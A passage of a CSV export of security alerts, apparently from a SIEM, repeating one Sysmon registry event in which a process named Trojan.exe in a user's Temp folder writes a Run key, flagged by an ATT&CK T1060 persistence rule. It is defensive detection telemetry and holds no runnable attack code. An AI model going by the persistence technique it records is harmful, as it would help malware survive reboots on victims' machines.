..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:11.950349800Z"",""eventRecordID"":""1964"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:11.949\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:11.949"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:14.312",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:10.933 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:10.934778700Z"",""eventRecordID"":""1963"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:10.933\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:10.933"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:13.312",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:09.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:09.923776800Z"",""eventRecordID"":""1962"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:09.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:09.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:12.298",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:08.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:08.903840600Z"",""eventRecordID"":""1961"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:08.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:08.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:11.282",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:07.887 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:07.889184900Z"",""eventRecordID"":""1960"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:07.887\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:07.887"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:10.251",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:06.871 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:06.872907800Z"",""eventRecordID"":""1959"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:06.871\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:06.871"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:09.252",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:05.855 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:05.858360700Z"",""eventRecordID"":""1957"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:05.855\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:05.855"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:08.236",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:04.840 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:04.842719800Z"",""eventRecordID"":""1956"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:04.840\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:04.840"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:07.205",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:03.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:03.826205800Z"",""eventRecordID"":""1955"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:03.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:03.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:06.189",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:02.809 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:02.810146000Z"",""eventRecordID"":""1954"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:02.809\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:02.809"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:05.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:01.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:01.794360400Z"",""eventRecordID"":""1953"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:01.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:01.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:04.174",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:00.778 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 